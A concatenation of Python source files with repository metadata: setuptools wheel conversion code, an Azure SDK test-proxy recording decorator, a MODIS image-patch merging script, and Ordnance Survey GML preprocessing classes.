wheel_metadata = get_metadata('WHEEL')
# Check wheel format version is supported.
wheel_version = parse_version(wheel_metadata.get('Wheel-Version'))
wheel_v1 = (
parse_version('1.0') <= wheel_version < parse_version('2.0dev0')
)
if not wheel_v1:
raise ValueError(
'unsupported wheel format version: %s' % wheel_version)
# Extract to target directory.
os.mkdir(destination_eggdir)
zf.extractall(destination_eggdir)
# Convert metadata.
dist_info = os.path.join(destination_eggdir, dist_info)
dist = pkg_resources.Distribution.from_location(
destination_eggdir, dist_info,
metadata=pkg_resources.PathMetadata(destination_eggdir, dist_info),
)
# Note: Evaluate and strip markers now,
# as it's difficult to convert back from the syntax:
# foobar; "linux" in sys_platform and extra == 'test'
def raw_req(req):
req.marker = None
return str(req)
install_requires = list(sorted(map(raw_req, dist.requires())))
extras_require = {
extra: sorted(
req
for req in map(raw_req, dist.requires((extra,)))
if req not in install_requires
)
for extra in dist.extras
}
os.rename(dist_info, egg_info)
os.rename(
os.path.join(egg_info, 'METADATA'),
os.path.join(egg_info, 'PKG-INFO'),
)
setup_dist = setuptools.Distribution(
attrs=dict(
install_requires=install_requires,
extras_require=extras_require,
),
)
# Temporarily disable info traces.
log_threshold = log._global_log.threshold
log.set_threshold(log.WARN)
try:
write_requirements(
setup_dist.get_command_obj('egg_info'),
None,
os.path.join(egg_info, 'requires.txt'),
)
finally:
log.set_threshold(log_threshold)
@staticmethod
def _move_data_entries(destination_eggdir, dist_data):
"""Move data entries to their correct location."""
dist_data = os.path.join(destination_eggdir, dist_data)
dist_data_scripts = os.path.join(dist_data, 'scripts')
if os.path.exists(dist_data_scripts):
egg_info_scripts = os.path.join(
destination_eggdir, 'EGG-INFO', 'scripts')
os.mkdir(egg_info_scripts)
for entry in os.listdir(dist_data_scripts):
# Remove bytecode, as it's not properly handled
# during easy_install scripts install phase.
if entry.endswith('.pyc'):
os.unlink(os.path.join(dist_data_scripts, entry))
else:
os.rename(
os.path.join(dist_data_scripts, entry),
os.path.join(egg_info_scripts, entry),
)
os.rmdir(dist_data_scripts)
for subdir in filter(os.path.exists, (
os.path.join(dist_data, d)
for d in ('data', 'headers', 'purelib', 'platlib')
)):
unpack(subdir, destination_eggdir)
if os.path.exists(dist_data):
os.rmdir(dist_data)
@staticmethod
def _fix_namespace_packages(egg_info, destination_eggdir):
namespace_packages = os.path.join(
egg_info, 'namespace_packages.txt')
if os.path.exists(namespace_packages):
with open(namespace_packages) as fp:
namespace_packages = fp.read().split()
for mod in namespace_packages:
mod_dir = os.path.join(destination_eggdir, *mod.split('.'))
mod_init = os.path.join(mod_dir, '__init__.py')
if not os.path.exists(mod_dir):
os.mkdir(mod_dir)
if not os.path.exists(mod_init):
with open(mod_init, 'w') as fp:
fp.write(NAMESPACE_PACKAGE_INIT)
| [
"noreply@github.com"
] | noreply@github.com |
9207964a8abeafead8e2e062e1c63f4719aa680e | d7016f69993570a1c55974582cda899ff70907ec | /tools/azure-sdk-tools/devtools_testutils/proxy_testcase.py | 0c0fe3dc403f3642e5552ec84ae5ffe10acbc867 | [
"LicenseRef-scancode-generic-cla",
"MIT",
"LGPL-2.1-or-later"
] | permissive | kurtzeborn/azure-sdk-for-python | 51ca636ad26ca51bc0c9e6865332781787e6f882 | b23e71b289c71f179b9cf9b8c75b1922833a542a | refs/heads/main | 2023-03-21T14:19:50.299852 | 2023-02-15T13:30:47 | 2023-02-15T13:30:47 | 157,927,277 | 0 | 0 | MIT | 2022-07-19T08:05:23 | 2018-11-16T22:15:30 | Python | UTF-8 | Python | false | false | 10,296 | py | # -------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
# --------------------------------------------------------------------------
import logging
import six
import os
from typing import TYPE_CHECKING
import urllib.parse as url_parse
from azure.core.exceptions import HttpResponseError, ResourceNotFoundError
from azure.core.pipeline.policies import ContentDecodePolicy
# the functions we patch
from azure.core.pipeline.transport import RequestsTransport
# the trimming function to clean up incoming arguments to the test function we are wrapping
from azure_devtools.scenario_tests.utilities import trim_kwargs_from_test_function
from .config import PROXY_URL
from .helpers import get_test_id, is_live, is_live_and_not_recording, set_recording_id
from .proxy_startup import discovered_roots
from urllib3 import PoolManager, Retry
from urllib3.exceptions import HTTPError
import json
if TYPE_CHECKING:
from typing import Callable, Dict, Tuple
from azure.core.pipeline.transport import HttpRequest
# To learn about how to migrate SDK tests to the test proxy, please refer to the migration guide at
# https://github.com/Azure/azure-sdk-for-python/blob/main/doc/dev/test_proxy_migration_guide.md
if os.getenv("REQUESTS_CA_BUNDLE"):
http_client = PoolManager(
retries=Retry(total=3, raise_on_status=False),
cert_reqs="CERT_REQUIRED",
ca_certs=os.getenv("REQUESTS_CA_BUNDLE"),
)
else:
http_client = PoolManager(retries=Retry(total=3, raise_on_status=False))
# defaults
RECORDING_START_URL = "{}/record/start".format(PROXY_URL)
RECORDING_STOP_URL = "{}/record/stop".format(PROXY_URL)
PLAYBACK_START_URL = "{}/playback/start".format(PROXY_URL)
PLAYBACK_STOP_URL = "{}/playback/stop".format(PROXY_URL)
def get_recording_assets(test_id: str) -> str:
"""
Used to retrieve the assets.json given a PYTEST_CURRENT_TEST test id.
"""
for root in discovered_roots:
current_dir = os.path.dirname(test_id)
while current_dir is not None and not (os.path.dirname(current_dir) == current_dir):
possible_assets = os.path.join(current_dir, "assets.json")
possible_root = os.path.join(current_dir, ".git")
# we need to check for assets.json first!
if os.path.exists(os.path.join(root, possible_assets)):
complete_path = os.path.abspath(os.path.join(root, possible_assets))
return os.path.relpath(complete_path, root).replace("\\", "/")
# we need the git check to prevent ascending out of the repo
elif os.path.exists(os.path.join(root, possible_root)):
return None
else:
current_dir = os.path.dirname(current_dir)
return None
def start_record_or_playback(test_id: str) -> "Tuple[str, Dict[str, str]]":
"""Sends a request to begin recording or playing back the provided test.
This returns a tuple, (a, b), where a is the recording ID of the test and b is the `variables` dictionary that maps
test variables to values. If no variable dictionary was stored when the test was recorded, b is an empty dictionary.
"""
variables = {} # this stores a dictionary of test variable values that could have been stored with a recording
json_payload = {"x-recording-file": test_id}
assets_json = get_recording_assets(test_id)
if assets_json:
json_payload["x-recording-assets-file"] = assets_json
encoded_payload = json.dumps(json_payload).encode("utf-8")
if is_live():
result = http_client.request(
method="POST",
url=RECORDING_START_URL,
body=encoded_payload,
)
if result.status != 200:
message = six.ensure_str(result.data)
raise HttpResponseError(message=message)
recording_id = result.headers["x-recording-id"]
else:
result = http_client.request(
method="POST",
url=PLAYBACK_START_URL,
body=encoded_payload,
)
if result.status != 200:
message = six.ensure_str(result.data)
raise HttpResponseError(message=message)
try:
recording_id = result.headers["x-recording-id"]
except KeyError as ex:
six.raise_from(ValueError("No recording file found for {}".format(test_id)), ex)
if result.data:
try:
variables = json.loads(result.data.decode("utf-8"))
except ValueError as ex: # would be a JSONDecodeError on Python 3, which subclasses ValueError
six.raise_from(
ValueError("The response body returned from starting playback did not contain valid JSON"),
ex,
)
# set recording ID in a module-level variable so that sanitizers can access it
set_recording_id(test_id, recording_id)
return (recording_id, variables)
def stop_record_or_playback(test_id: str, recording_id: str, test_variables: "Dict[str, str]") -> None:
try:
if is_live():
http_client.request(
method="POST",
url=RECORDING_STOP_URL,
headers={
"x-recording-file": test_id,
"x-recording-id": recording_id,
"x-recording-save": "true",
"Content-Type": "application/json",
},
# tests don't record successfully unless test_variables is a dictionary
body=json.dumps(test_variables).encode("utf-8") if test_variables else "{}",
)
else:
http_client.request(
method="POST",
url=PLAYBACK_STOP_URL,
headers={"x-recording-id": recording_id},
)
except HTTPError as e:
raise HttpResponseError(
"The test proxy ran into an error while ending the session. Make sure any test variables you record have "
"string values."
) from e
def get_proxy_netloc() -> "Dict[str, str]":
parsed_result = url_parse.urlparse(PROXY_URL)
return {"scheme": parsed_result.scheme, "netloc": parsed_result.netloc}
def transform_request(request: "HttpRequest", recording_id: str) -> None:
"""Redirect the request to the test proxy, and store the original request URI in a header"""
headers = request.headers
parsed_result = url_parse.urlparse(request.url)
updated_target = parsed_result._replace(**get_proxy_netloc()).geturl()
if headers.get("x-recording-upstream-base-uri", None) is None:
headers["x-recording-upstream-base-uri"] = "{}://{}".format(parsed_result.scheme, parsed_result.netloc)
headers["x-recording-id"] = recording_id
headers["x-recording-mode"] = "record" if is_live() else "playback"
request.url = updated_target
def recorded_by_proxy(test_func: "Callable") -> None:
"""Decorator that redirects network requests to target the azure-sdk-tools test proxy. Use with recorded tests.
For more details and usage examples, refer to
https://github.com/Azure/azure-sdk-for-python/blob/main/doc/dev/test_proxy_migration_guide.md
"""
def record_wrap(*args, **kwargs):
def transform_args(*args, **kwargs):
copied_positional_args = list(args)
request = copied_positional_args[1]
transform_request(request, recording_id)
return tuple(copied_positional_args), kwargs
trimmed_kwargs = {k: v for k, v in kwargs.items()}
trim_kwargs_from_test_function(test_func, trimmed_kwargs)
if is_live_and_not_recording():
return test_func(*args, **trimmed_kwargs)
test_id = get_test_id()
recording_id, variables = start_record_or_playback(test_id)
original_transport_func = RequestsTransport.send
def combined_call(*args, **kwargs):
adjusted_args, adjusted_kwargs = transform_args(*args, **kwargs)
result = original_transport_func(*adjusted_args, **adjusted_kwargs)
# make the x-recording-upstream-base-uri the URL of the request
# this makes the request look like it was made to the original endpoint instead of to the proxy
# without this, things like LROPollers can get broken by polling the wrong endpoint
parsed_result = url_parse.urlparse(result.request.url)
upstream_uri = url_parse.urlparse(result.request.headers["x-recording-upstream-base-uri"])
upstream_uri_dict = {
"scheme": upstream_uri.scheme,
"netloc": upstream_uri.netloc,
}
original_target = parsed_result._replace(**upstream_uri_dict).geturl()
result.request.url = original_target
return result
RequestsTransport.send = combined_call
# call the modified function
# we define test_variables before invoking the test so the variable is defined in case of an exception
test_variables = None
try:
try:
test_variables = test_func(*args, variables=variables, **trimmed_kwargs)
except TypeError:
logger = logging.getLogger()
logger.info(
"This test can't accept variables as input. The test method should accept `**kwargs` and/or a "
"`variables` parameter to make use of recorded test variables."
)
test_variables = test_func(*args, **trimmed_kwargs)
except ResourceNotFoundError as error:
error_body = ContentDecodePolicy.deserialize_from_http_generics(error.response)
message = error_body.get("message") or error_body.get("Message")
error_with_message = ResourceNotFoundError(message=message, response=error.response)
six.raise_from(error_with_message, error)
finally:
RequestsTransport.send = original_transport_func
stop_record_or_playback(test_id, recording_id, test_variables)
return test_variables
return record_wrap
| [
"noreply@github.com"
] | noreply@github.com |
4e543bc8c6bb809b7f5768311a7fdfba0a10f29d | 5f063a25f88dded96928282dd79bd06c8c0ee805 | /testdata/mergeImage.py | 357b17abdcd3f0a6336eac3dc2c0337d0ae03c00 | [
"MIT"
] | permissive | Cogito2012/pix2pix-tf-modis | f87a0e77b83d26a9cac2e7cdec44eb39a7ad0eae | 1fbfaf7665f6b794bbd800185b0c34e5522d3ba0 | refs/heads/master | 2021-01-22T11:28:50.005570 | 2017-05-29T03:18:09 | 2017-05-29T03:18:09 | 92,701,944 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,039 | py | # merger patches to China.bmp
import os
import cv2
import numpy as np
input_dir = "./patches_translate"
dest_file = "ModisChina.bmp"
patchsize = 512
patchnum_x = 30
patchnum_y = 24
#ModisChina = cv2.CreateImage((patchnum_x*patchsize, patchnum_y*patchsize),8,3)
Modischina = np.zeros([patchnum_y*patchsize, patchnum_x*patchsize, 3])
fileIDs = list("h%02dv%02d"%(i,j) for i in range(patchnum_x) for j in range(patchnum_y))
image_list = os.listdir(input_dir)
for fileid in fileIDs:
#print fileid
# get the row and colunm index of Modischina
col = int(fileid[1:3])
row = int(fileid[4:6])
filename = "patch_%s_trans.png"%fileid
if filename not in image_list:
print("PNG file: %s is missing!\n"%fileid)
patch = np.zeros([3,patchsize,patchsize])
print fileIDs.index(fileid)
imagefile = os.path.join(input_dir,filename)
patch = cv2.imread(imagefile)
Modischina[row*patchsize:(row+1)*patchsize, col*patchsize:(col+1)*patchsize,:] = patch
cv2.imwrite(dest_file,Modischina)
print("Done!") | [
"wtbao@whu.edu.cn"
] | wtbao@whu.edu.cn |
a291571004a5644ecfc815c6c978d6daa08d8d74 | 382240eed333d0577b23fbc81b06429a17ce544d | /python/prep_osgml.py | a6c2332d22bd4eb0b1acdc95aae21d68ee5bcc9b | [
"Apache-2.0",
"MIT",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | rjspiers/Loader | e5c3f0ca9c54c6dd443521936a238de7233094d4 | 560f216f4703bc5850ddc889ae347db3ec689902 | refs/heads/master | 2021-01-01T18:18:52.957426 | 2017-07-22T17:13:19 | 2017-07-22T17:13:19 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 25,260 | py | """
A collection of classes used to manipulate Ordnance Survey GB GML data,
used with prepgml4ogr.py.
"""
from lxml import etree
from lxml import objectify
import json
import lxml
import os
import re
import sys
# Mock arcpy which is imported by not used in the ESRI UK modules used to
# classify OSMM Topo features
sys.modules['arcpy'] = __import__('sys')
import osmm_topo_style.area_style
import osmm_topo_style.bnd_style
import osmm_topo_style.line_style
import osmm_topo_style.pnt_style
import osmm_topo_style.sym_style
import osmm_topo_style.txt_style
class prep_osgml():
"""
Base class that provides the main interface methods `prepare_feature` and
`get_feat_types` and performs basic manipulation such as exposing the fid,
adding and element containing the filename of the source and adding an
element with the orientation in degrees.
"""
def __init__(self, inputfile):
self.inputfile = inputfile
self.feat_types = []
def get_feat_types(self):
return self.feat_types
def prepare_feature(self, feat_str):
# Parse the xml string into something useful
feat_elm = etree.fromstring(feat_str)
feat_elm = self._prepare_feat_elm(feat_elm)
return etree.tostring(feat_elm,
encoding='UTF-8',
pretty_print=True).decode('utf_8')
def _prepare_feat_elm(self, feat_elm):
feat_elm = self._set_srs(feat_elm)
feat_elm = self._add_fid_elm(feat_elm)
feat_elm = self._add_filename_elm(feat_elm)
feat_elm = self._add_orientation_degree_elms(feat_elm)
return feat_elm
def _set_srs(self, feat_elm):
srs_elms = feat_elm.xpath('//*[@srsName]')
for elm in srs_elms:
elm.attrib['srsName'] = 'EPSG:27700'
return feat_elm
def _add_fid_elm(self, feat_elm):
# Create an element with the fid
elm = etree.SubElement(feat_elm, "fid")
elm.text = feat_elm.get('fid')
return feat_elm
def _add_filename_elm(self, feat_elm):
# Create an element with the filename
elm = etree.SubElement(feat_elm, "filename")
elm.text = os.path.basename(self.inputfile)
return feat_elm
def _add_orientation_degree_elms(self, feat_elm):
# Correct any orientation values to be a
# tenth of their original value
orientation_elms = feat_elm.xpath('//orientation')
for elm in orientation_elms:
# Add a new orientDeg element as a child to the
# the orientation elm to be orientation/10
# (this applies integer division which is fine in
# this instance as we are not concerned with the decimals)
degree_elm = etree.SubElement(elm.getparent(), "orientDeg")
degree_elm.text = str(int(elm.text) / 10)
return feat_elm
class prep_vml(prep_osgml):
"""
Preperation class for OS VectorMap Local features.
"""
def __init__(self, inputfile):
prep_osgml.__init__(self, inputfile)
self.feat_types = [
'Text',
'VectorMapPoint',
'Line',
'RoadCLine',
'Area',
'creationDate'
]
def _prepare_feat_elm(self, feat_elm):
# We need to record the creation date so that we can include it as an
# attribute on all features, when we are passed the creationDate
# element simply record it's text value and return it as is. This is
# potentially brittle as it assumes that the creationDate element
# appears before the features in the source GML.
if feat_elm.tag == 'creationDate':
self.creation_date = feat_elm.text
return feat_elm
else:
feat_elm = prep_osgml._prepare_feat_elm(self, feat_elm)
feat_elm = self._add_tile_elm(feat_elm)
feat_elm = self._add_creation_date_elm(feat_elm)
return feat_elm
def _add_tile_elm(self, feat_elm):
elm = etree.SubElement(feat_elm, "tile")
elm.text = os.path.splitext(os.path.basename(self.inputfile))[0]
return feat_elm
def _add_creation_date_elm(self, feat_elm):
elm = etree.SubElement(feat_elm, "creationDate")
elm.text = self.creation_date
return feat_elm
class prep_vmd(prep_osgml):
def __init__(self, inputfile):
prep_osgml.__init__(self, inputfile)
self.feat_types = [
'AdministrativeBoundary',
'Airport',
'Building',
'ElectricityTransmissionLine',
'Foreshore',
'Glasshouse',
'HeritageSite',
'Land',
'NamedPlace',
'Woodland',
'Ornament',
'PublicAmenity',
'RailwayStation',
'RailwayTrack',
'RailwayTunnel',
'Road',
'MotorwayJunction',
'RoadTunnel',
'Roundabout',
'SpotHeight',
'SurfaceWater_Area',
'SurfaceWater_Line',
'TidalBoundary',
'TidalWater'
]
def _add_fid_elm(self, feat_elm):
# Create an element with the fid
elm = etree.SubElement(feat_elm, "fid")
elm.text = feat_elm.get('id')
return feat_elm
class prep_osmm_topo(prep_osgml):
"""
Preperation class for OS MasterMap features which in addition to the work
performed by `prep_osgml` adds `themes`, `descriptiveGroups` and
`descriptiveTerms` elements containing a delimited string of the attributes
that can appear multiple times.
"""
def __init__(self, inputfile):
prep_osgml.__init__(self, inputfile)
self.feat_types = [
'BoundaryLine',
'CartographicSymbol',
'CartographicText',
'TopographicArea',
'TopographicLine',
'TopographicPoint'
]
self.list_seperator = ', '
def _prepare_feat_elm(self, feat_elm):
feat_elm = prep_osgml._prepare_feat_elm(self, feat_elm)
feat_elm = self._add_lists_elms(feat_elm)
feat_elm = self._add_style_elms(feat_elm)
return feat_elm
def _add_lists_elms(self, feat_elm):
feat_elm = self._create_list_of_terms(feat_elm, 'theme')
feat_elm = self._create_list_of_terms(feat_elm, 'descriptiveGroup')
feat_elm = self._create_list_of_terms(feat_elm, 'descriptiveTerm')
return feat_elm
def _add_style_elms(self, feat_elm):
descriptiveTerms = self._get_list_of_terms(feat_elm, 'descriptiveTerms')
descriptiveGroups = self._get_list_of_terms(feat_elm, 'descriptiveGroups')
make = self._get_list_of_terms(feat_elm, 'make')
physicalPresence = self._get_list_of_terms(feat_elm, 'physicalPresence')
featureCode = int(self._get_list_of_terms(feat_elm, 'featureCode'))
style_code = 99
style_description = 'Unclassified'
if feat_elm.tag == 'TopographicArea':
row = ['', '', '', descriptiveTerms, descriptiveGroups, make]
style_code = osmm_topo_style.area_style.CalculateStyleCode(row)
style_description = osmm_topo_style.area_style.CalculateStyleDescription(row)
elif feat_elm.tag == 'TopographicLine':
row = ['', '', '', descriptiveTerms, descriptiveGroups, make, physicalPresence]
style_code = osmm_topo_style.line_style.CalculateStyleCode(row)
style_description = osmm_topo_style.line_style.CalculateStyleDescription(row)
elif feat_elm.tag == 'TopographicPoint':
row = ['', '', '', descriptiveGroups, descriptiveTerms, make]
style_code = osmm_topo_style.pnt_style.CalculateStyleCode(row)
style_description = osmm_topo_style.pnt_style.CalculateStyleDescription(row)
elif feat_elm.tag == 'BoundaryLine':
row = ['', '', '', featureCode]
style_code = osmm_topo_style.bnd_style.CalculateStyleCode(row)
style_description = osmm_topo_style.bnd_style.CalculateStyleDescription(row)
elif feat_elm.tag == 'CartographicSymbol':
row = ['', '', '', featureCode]
style_code = osmm_topo_style.sym_style.CalculateStyleCode(row)
style_description = osmm_topo_style.sym_style.CalculateStyleDescription(row)
elif feat_elm.tag == 'CartographicText':
anchorPosition = float(self._get_list_of_terms(feat_elm, 'anchorPosition'))
orientation = float(self._get_list_of_terms(feat_elm, 'orientation'))
row = ['', '', '', descriptiveGroups, descriptiveTerms, make, anchorPosition, '', '', '', '', '', '', orientation]
style_code = osmm_topo_style.txt_style.CalculateStyleCode(row)
style_description = osmm_topo_style.txt_style.CalculateStyleDescription(row)
anchor = osmm_topo_style.txt_style.CalculateAnchor(row)
elm = etree.SubElement(feat_elm, 'anchor')
elm.text = unicode(anchor)
geo_x = osmm_topo_style.txt_style.CalculateGeoX(row)
elm = etree.SubElement(feat_elm, 'geo_x')
elm.text = unicode(geo_x)
geo_y = osmm_topo_style.txt_style.CalculateGeoY(row)
elm = etree.SubElement(feat_elm, 'geo_y')
elm.text = unicode(geo_y)
font_code = osmm_topo_style.txt_style.CalculateFontCode(row)
elm = etree.SubElement(feat_elm, 'font_code')
elm.text = unicode(font_code)
colour_code = osmm_topo_style.txt_style.CalculateColorCode(row)
elm = etree.SubElement(feat_elm, 'colour_code')
elm.text = unicode(colour_code)
rotation = osmm_topo_style.txt_style.CalculateRotation(row)
elm = etree.SubElement(feat_elm, 'rotation')
elm.text = unicode(rotation)
elm = etree.SubElement(feat_elm, "%s" % 'styleCode')
elm.text = unicode(style_code)
elm = etree.SubElement(feat_elm, "%s" % 'styleDescription')
elm.text = unicode(style_description)
return feat_elm
def _create_list_of_terms(self, feat_elm, name):
text_list = feat_elm.xpath('//%s/text()' % name)
if len(text_list):
elm = etree.SubElement(feat_elm, "%ss" % name)
elm.text = self.list_seperator.join(text_list)
return feat_elm
def _get_list_of_terms(self, feat_elm, name):
text_list = feat_elm.xpath('//%s/text()' % name)
if len(text_list):
return self.list_seperator.join(text_list)
return ''
class prep_osmm_topo_qgis(prep_osmm_topo):
"""
Preperation class for OS MasterMap features which in addition to the work performed by
`prep_osmm_topo` adds QGIS specific label attributes such as `qFont` and `aAnchorPos`.
"""
def __init__(self, filename):
prep_osmm_topo.__init__(self, filename)
# AC - define the font
if os.name is 'posix':
# Will probably need different font names
self.fonts = ('Garamond', 'Arial', 'Roman', 'ScriptC')
elif os.name is 'nt':
# Ordnance Survey use
# 'Lutheran', 'Normal', 'Light Roman', 'Suppressed text'
self.fonts = ('GothicE', 'Monospac821 BT', 'Consolas', 'ScriptC', 'Arial Narrow')
elif os.name is 'mac':
# Will probably need different font name
self.fonts = ('Garamond', 'Arial', 'Roman', 'ScriptC')
# AC - the possible text placement positions used by QGIS
self.anchorPosition = ('Bottom Left', 'Left', 'Top Left', 'Bottom',
'Over', 'Top', 'Bottom Right', 'Right', 'Top Right')
def _prepare_feat_elm(self, feat_elm):
feat_elm = prep_osmm_topo._prepare_feat_elm(self, feat_elm)
feat_elm = self._add_qgis_elms(feat_elm)
return feat_elm
def _add_qgis_elms(self, feat_elm):
if feat_elm.tag == 'CartographicText':
text_render_elm = feat_elm.xpath('//textRendering')[0]
anchor_pos = int(text_render_elm.xpath('./anchorPosition/text()')[0])
try:
anchor_pos = self.anchorPosition[anchor_pos]
except:
anchor_pos = 4
elm = etree.SubElement(text_render_elm, 'qAnchorPos')
elm.text = anchor_pos
font = int(text_render_elm.xpath('./font/text()')[0])
try:
font = self.fonts[font]
except:
font = 'unknown font (%s)' % str(font)
elm = etree.SubElement(text_render_elm, 'qFont')
elm.text = font
return feat_elm
class prep_osmm_itn(prep_osgml):
"""
Preparation class for OS MasterMap ITN features.
"""
def __init__(self, filename):
prep_osgml.__init__(self, filename)
self.feat_types = [
'Road',
'RoadLink',
'RoadNode',
'FerryLink',
'FerryNode',
'FerryTerminal',
'InformationPoint',
'RoadNodeInformation',
'RoadLinkInformation',
'RoadRouteInformation'
]
def _prepare_feat_elm(self, feat_elm):
feat_elm = prep_osgml._prepare_feat_elm(self, feat_elm)
feat_elm = self._expose_attributes(feat_elm)
feat_elm = self._add_datetime_summary(feat_elm)
feat_elm = self._add_datetime_json(feat_elm)
return feat_elm
def _expose_attributes(self, feat_elm):
elm_list = feat_elm.xpath("""//networkMember |
//directedLink |
//directedNode |
//referenceToRoadLink |
//referenceToRoadNode |
//referenceToTopographicArea |
//referenceToNetwork |
//vehicleQualifier/type |
//vehicleQualifier/use""")
# Default attribute values for optional attributes
defaults = {
'directedNode': {'gradeSeparation': '0'},
'referenceToRoadNode': {'gradeSeparation': '0'}
}
for elm in elm_list:
# Assign default values to optional attributes
if elm.tag in defaults.keys():
for key, val in defaults[elm.tag].items():
if key not in elm.attrib:
elm.attrib[key] = val
for name in elm.attrib:
value = elm.get(name)
name = '%s_%s' % (elm.tag, name)
sub_elm = etree.SubElement(elm if not elm.text else elm.getparent(), name)
sub_elm.text = value
return feat_elm
def _add_datetime_summary(self, feat_elm):
def elm_str(elm):
return elm.tag + ((': ' + elm.text) if elm.text else '')
for elm in feat_elm.xpath('//dateTimeQualifier'):
# Create a basic summary by listing tag names and values
value = ', '.join(map(elm_str, elm.xpath(".//*")))
sub_elm = etree.SubElement(feat_elm, 'dateTimeQualifier_summary')
sub_elm.text = value
return feat_elm
def _add_datetime_json(self, feat_elm):
""" Add a JSON representation of dateTimeQualifier elements """
elms = feat_elm.xpath('//dateTimeQualifier')
if elms:
objs = [objectify.fromstring(etree.tostring(elm)) for elm in elms]
sub_elm = etree.SubElement(feat_elm, 'dateTimeQualifier_json')
sub_elm.text = ObjectifyJSONEncoder().encode(objs)
return feat_elm
class prep_addressbase():
"""
Simple preperation of AddressBase data
"""
def __init__(self, inputfile):
self.inputfile = inputfile
self.feat_types = ['Address']
def get_feat_types(self):
return self.feat_types
def prepare_feature(self, feat_str):
# Parse the xml string into something useful
feat_elm = etree.fromstring(feat_str)
feat_elm = self._prepare_feat_elm(feat_elm)
return etree.tostring(feat_elm,
encoding='UTF-8',
pretty_print=True).decode('utf_8')
def _prepare_feat_elm(self, feat_elm):
feat_elm = self._drop_gmlid(feat_elm)
return feat_elm
def _drop_gmlid(self, feat_elm):
feat_elm.attrib.pop('id')
return feat_elm
class prep_addressbase_premium(prep_addressbase):
"""
Preperation of AddressBase Premium data
"""
def __init__(self, inputfile):
prep_addressbase.__init__(self, inputfile)
self.feat_types = ['BasicLandPropertyUnit', 'Street']
def prepare_feature(self, feat_str):
# Parse the xml string into something useful
feat_elm = etree.fromstring(feat_str)
# Manipulate the feature
feat_elm = self._prepare_feat_elm(feat_elm)
# In this instance we are not returning a string representing a single
# element as we are unnesting features in the AddressBase Premium GML.
# We end up returning a string of several elements which are wrapped in
# the output document with either a streetMember or
# basicLandPropertyUnitMember element which result it valid XML
elms = [etree.tostring(feat_elm,
encoding='UTF-8',
pretty_print=True).decode('utf_8')]
for elm in self.member_elms:
elms.append(
etree.tostring(elm, encoding='UTF-8',
pretty_print=True).decode('utf_8'))
return ''.join(elms)
def _prepare_feat_elm(self, feat_elm):
feat_elm = prep_addressbase._prepare_feat_elm(self, feat_elm)
feat_elm = self._to_multipoint(feat_elm)
self.member_elms = self._extract_child_members(feat_elm)
return feat_elm
def _to_multipoint(self, feat_elm):
""" Move Street streetStart and streetEnd Point elements into a
MultiPoint """
if feat_elm.tag == 'Street':
multi_elm = etree.SubElement(etree.SubElement(feat_elm, 'geom'),
'MultiPoint')
point_elms = feat_elm.xpath('//streetStart/Point|//streetEnd/Point')
for point_elm in point_elms:
etree.SubElement(multi_elm, 'pointMember').append(point_elm)
return feat_elm
def _extract_child_members(self, feat_elm):
""" Unnest BLPU and Street feature types adding a reference to uprn or
usrn as appropriate """
if feat_elm.tag == 'BasicLandPropertyUnit':
uprn = feat_elm.findtext('uprn')
child_elms = feat_elm.xpath("""//Classification |
//LandPropertyIdentifier |
//ApplicationCrossReference |
//DeliveryPointAddress |
//Organisation""")
for elm in child_elms:
elm.getparent().remove(elm)
elm = self._add_lang_elm(elm)
sub_elm = etree.SubElement(elm, 'uprn')
sub_elm.text = uprn
if feat_elm.tag == 'Street':
usrn = feat_elm.findtext('usrn')
child_elms = feat_elm.xpath("//StreetDescriptiveIdentifier")
for elm in child_elms:
elm.getparent().remove(elm)
elm = self._add_lang_elm(elm)
sub_elm = etree.SubElement(elm, 'usrn')
sub_elm.text = usrn
return child_elms
def _add_lang_elm(self, feat_elm):
if feat_elm.tag in ['StreetDescriptiveIdentifier', 'LandPropertyIdentifier']:
elm = etree.SubElement(feat_elm, "lang")
try:
lang = feat_elm.xpath('.//@lang')[0]
except IndexError:
lang = 'en'
elm.text = lang
return feat_elm
class prep_osmm_water():
"""
Preperation of OSMM Water Layer features
"""
def __init__(self, inputfile):
self.inputfile = inputfile
self.feat_types = ['WatercourseLink', 'HydroNode']
def prepare_feature(self, feat_str):
# Parse the xml string into something useful
feat_elm = etree.fromstring(feat_str)
feat_elm = self._prepare_feat_elm(feat_elm)
return etree.tostring(feat_elm,
encoding='UTF-8',
pretty_print=True).decode('utf_8')
def _prepare_feat_elm(self, feat_elm):
feat_elm = self._add_fid_elm(feat_elm)
feat_elm = self._add_filename_elm(feat_elm)
feat_elm = self._add_start_end_node_elm(feat_elm)
feat_elm = self._add_code_list_values(feat_elm)
return feat_elm
def _add_fid_elm(self, feat_elm):
# Create an element with the fid
elm = etree.SubElement(feat_elm, "fid")
elm.text = feat_elm.get('id')
return feat_elm
def _add_filename_elm(self, feat_elm):
# Create an element with the filename
elm = etree.SubElement(feat_elm, "filename")
elm.text = os.path.basename(self.inputfile)
return feat_elm
def _add_start_end_node_elm(self, feat_elm):
start_elm = feat_elm.xpath('//startNode')
if len(start_elm):
etree.SubElement(feat_elm,
'startNode').text = start_elm[0].get('href')[1:]
end_elm = feat_elm.xpath('//endNode')
if len(end_elm):
etree.SubElement(feat_elm,
'endNode').text = end_elm[0].get('href')[1:]
return feat_elm
def _add_code_list_values(self, feat_elm):
list_elms = feat_elm.xpath("""//reasonForChange |
//form |
//provenance |
//levelOfDetail""")
r = re.compile('#(.*)$')
for elm in list_elms:
matches = r.findall(elm.get('href'))
if len(matches):
elm.text = matches[0]
return feat_elm
class prep_emapsite_addressbase_premium(prep_osgml):
"""
Prepare emapsite OS AddressBase Premium GML output by FME
"""
def __init__(self, inputfile):
prep_osgml.__init__(self, inputfile)
# Looking at the sample data it doesn't appear as though the name of
# the AddressBaseT_Plus feature type is likely to be the same for each
# supply so as there is only one feature type simply specify the
# containing featureMember
self.feat_types = ['featureMember']
def _prepare_feat_elm(self, feat_elm):
feat_elm = self._add_geom(feat_elm)
return feat_elm
def _add_geom(self, feat_elm):
""" Add a GML Point element to a feature with coordinates taken from
the x_coordinate and y_coordinate fields """
pos_elm = etree.SubElement(feat_elm, 'Pos')
pos_elm.text = '%s %s' % (feat_elm.findtext('.//x_coordinate'), feat_elm.findtext('.//y_coordinate'))
pnt_elm = etree.SubElement(feat_elm, 'Point')
pnt_elm.attrib['srsName'] = 'EPSG:27700'
pnt_elm.append(pos_elm)
